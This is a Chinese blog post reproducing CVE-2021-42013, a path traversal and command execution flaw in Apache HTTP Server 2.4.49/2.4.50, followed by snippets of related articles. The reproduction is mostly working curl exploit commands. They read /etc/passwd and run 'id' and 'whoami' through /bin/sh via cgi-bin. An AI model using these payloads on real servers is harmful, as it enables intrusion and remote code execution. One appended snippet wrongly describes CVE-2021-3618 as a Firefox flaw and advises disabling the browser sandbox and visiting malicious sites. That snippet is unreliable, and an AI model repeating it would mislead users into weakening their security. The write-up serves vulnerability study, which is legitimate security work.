CVE-2021-42013漏洞复现

已于 2023-04-28 12:00:59 修改
阅读量223 收藏 4
点赞数 6
文章标签: 安全 服务器 web安全
于 2023-04-28 09:21:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53365018/article/details/130419501
版权

CVE-2021-42013
漏洞原理
Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。

影响版本

Apache 2.4.49 和 Apache 2.4.50

漏洞复现


curl -v --path-as-is http://192.168.83.56:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd




在服务器上启用 mods cgi 或 cgid 后,此路径遍历漏洞将允许任意命令执行:

curl -v --data "echo;id" 'http://192.168.83.56:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

或者

curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; whoami' "http://192.168.83.56:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh"


修复方法

升级到Apache HTTP Server安全版本。

Battle me
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
CVE-2021-42013 Apache路径穿越&命令执行漏洞
afei001
10-10 2361
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞 4.3 CVE-2021-42013 POC 5.修建议 1.漏洞概述 CVE-2021-42013是由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修不完善,攻击者可构造恶意请求绕过补丁,利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服务器。 2.影响版本 仅影响...
CVE-2021-42013 漏洞
爱吃仡坨的Blog
10-13 550
Apache HTTP Server 2.4.50版本对CVE-2021-41773的修可以避免一次url编码导致的路径穿越,但是由于在请求处理过程中,还会调用ap_unescape_url函数对参数再次进行解码,使得需进行两次解码,但即使这样仍然会导致路径穿越。
CVE-2021-42013 Apache HTTP Server 路径穿越漏洞——漏洞
qq_60905276的博客
06-07 4807
Apache 披露了一个在 Apache HTTP Server 2.4.49 上引入的漏洞,称为 CVE-2021-41773。
漏洞】Apache_HTTP_2.4.50_路径穿越漏洞(CVE-2021-42013)
过期的秋刀鱼
11-04 1155
的不完整修导致的漏洞,攻击者可以使用路径遍历攻击将URL映射到由类似别名指令配置的目录之外的文件。此漏洞影响Apache HTTP Server 2.4.49和2.4.50,而不影响更早版本。Apache HTTP Server 2.4.50修补了以前的CVE-2021-41773漏洞。在服务器上启用mods cgi或cgid后,此路径遍历漏洞将允许执行任意命令。Apache HTTP Server 2.4.49以及2.4.50两个版本。CVE-2021-42013是由。必须是一个存在且可访问的目录)
CVE-2021-42013 路径穿越漏洞并反弹shell
m0_53073183的博客
02-01 970
CVE-2021-42013 路径穿越漏洞并反弹shell
检测通过“ proxylogon”组漏洞CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
预认证SSRF,CVSS:3.0 9.1 / 8.4 CVE-2021-26857,不安全的反序列化导致特权升级到SYSTEM级别,CVSS:3.0 7.8 / 7.2 CVE-2021-26858,认证后文件写入, CVSS:3.0 7.8 / 7.2 CVE-2021-27065,认证后文件写入,CVSS...
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
CVE-2021-24085
03-05
Microsoft Exchange Server msExchEcpCanary跨站点请求伪造特权提升漏洞 这是CVE-2021-24085的概念证明。 poc.py下载目标证书文件,其中包含私钥 YellowCanary根据SID为特定用户生成msExchEcpCanary csrf令牌 poc.js是触发帐户接管的csrf漏洞 我没有提供malicifest.xml文件,但是您可以在下面的参考部分中找到有关如何从可用资源中生成恶意清单文件的信息。 例子 使用内部的私钥访问证书: researcher@srcincite:~$ ./poc.py (+) usage: ./poc.py <target> <user> (+) eg: ./poc.py 192.168.75.142 harryh@exchangedemo.com:user123### researcher@s
CVE-2021-26855
03-12
**CVE-2021-26855:Exchange Server 漏洞详解** CVE-2021-26855 是一个影响 Microsoft Exchange Server 的高严重性漏洞,该漏洞允许远程未经身份验证的攻击者执行任意代码,从而获取对目标系统的完全控制。这个漏洞...
(环境搭建+)Apache CVE-2021-41773 && CVE-2021-42013系列漏洞
daxi0ng的博客
10-11 1815
0x00 简介 Apache HTTP Server(HTTPd)是Apache软件基金会的一个开放源代码的网页服务器。 0x01 漏洞概述 Apache HTTP Server目录遍历漏洞CVE-2021-41773 影响版本:Apache HTTP Server 2.4.49 该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,攻击者利用该漏洞在未授权的情况下,访问服务器未在httpd配置文件中标记为拒绝请求的文...
Apache Druid 命令执行漏洞CVE-2021-25646)
千寻的博客
02-04 1929
学习笔记下载 https://download.csdn.net/download/qq_41901122/15051281 文章目录学习笔记下载漏洞编号漏洞描述影响版本环境搭建第一步 安装jdk8环境第二步 搭建Druid第三步 访问8888端口漏洞查找漏洞点方法一:DNS解析方法二:反弹shell修建议摘抄 漏洞编号 CVE-2021-25646 发布时间:2021-01-29 漏洞等级:高 漏洞描述 Apache Druid 是一个分布式的数据处理系统。 Apache Druid包括执行
OpenSSH权限提升漏洞CVE-2021-41617)修 Centos 7升级Openssh 8.8
热门推荐
Q先生
10-21 1万+
OpenSSH权限提升漏洞CVE-2021-41617)修1.准备工作2.安装必须的包3.下载OpenSsh 8.8p14.OpenSsh 解压安装5.配置文件修改6.重启服务7.意外 Centos 7升级Openssh 8.8 1.准备工作 yum仓库怎么配置详见 https://blog.csdn.net/qq_29974229/article/details/103827369 2.安装必须的包 yum install -y gcc openssl-devel zlib-devel wget
解决OPENSSL安全漏洞(CVE-2021-41617)
qq_55854984的博客
01-16 1092
#注意“/usr/local/libexec/sftp-server”的地址需根据实际环境来,一般为“/usr/local/libexec/sftp-server”##也有的为“/usr/local/libexec/openssh/sftp-server”###以下命令物理机执行,ECS服务器不存在sshd.service配置文件 ,可跳过。#当前系统版本,即openssh版本。#遇到报错,安装相关依赖。#输入yes,覆盖文件。#检查通过,开始编译。#创建系统初始化脚本。
kali2021和win7环境下勒索病毒
大大大鸡腿的博客
06-23 2498
勒索病毒 实验以kali作为攻击机,win7系统作为靶机,攻击时将win7防火墙关闭,不然会被拦截 首先查看靶机ip地址:192.168.231.130 攻击机ip地址:192.168.231.129 使用kali打开msf 然后我们搜索ms17模块 auxiliary渗透脚本测试,查看靶机是否存在永恒之蓝漏洞 注意:我这里使用的是msf6版本,如果想要使用哪个模块,直接输入模块编号就行,但如果是msf5,需要输入use 模块名 show options命令查看此模块需要的参数,发有4个是必须的,
统信UOS(统信服务器操作系统debian)修CVE高危漏洞
AirIT的博客
06-08 1568
针对某托管平台分配的4台虚拟服务器,操作系统统信UOS(Debian)服务器发高危漏洞OpenSSH 命令注入漏洞(CVE-2020-15778) / OpenSSH 安全漏洞(CVE-2021-41617) / OpenSSH 输入验证错误漏洞(CVE-2019-16905) 的修办法。
centos7服务器升级ssh版本&&修ssh漏洞 CVE-2016-20012、 CVE-2021-41617
小爽帅到拖网速的博客
11-11 3946
ssh漏洞通过升级ssh版本进行有效规避
cve-2021-3618漏洞
最新发布
02-06
CVE-2021-3618漏洞是指影响了Mozilla Firefox浏览器的一个安全漏洞。该漏洞步骤如下: 1. 首先,你需要安装最新版本的Mozilla Firefox浏览器。确保你的浏览器已经更新到最新版本,因为最新版本通常会修已知的漏洞。 2. 在Firefox浏览器中,打开一个新的标签页,并输入“about:config”(不包括引号)并按下Enter键。这将打开Firefox的高级配置页面。 3. 在搜索栏中输入“security.sandbox.content.level”(不包括引号),然后按下Enter键。你将看到一个名为“security.sandbox.content.level”的首选项。 4. 将“security.sandbox.content.level”的值更改为“0”(不包括引号)。这将禁用Firefox的内容沙箱。请注意,这将降低浏览器的安全性,请谨慎操作。 5. 关闭并重新启动Firefox浏览器,使更改生效。 6. 在,你可以尝试CVE-2021-3618漏洞。使用Firefox浏览器访问一个存在安全漏洞的网站,如已知的恶意或受攻击的网站,或使用特定的payload触发漏洞。 7. 如果成功,可能会出安全漏洞所导致的异常行为,比如系统崩溃、恶意代码执行等。如果没有出异常行为,可能是因为已经修了该漏洞或在你的环境中无法成功利用。 需要注意的是,CVE漏洞可能存在风险,并可能对你的计算机造成不可逆转的损害。这种操作只适用于在合法情况下进行安全测试和研究的专业人士,不推荐普通用户进行尝试。实施操作之前,请确认你已经了解并接受相关风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Battle me

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值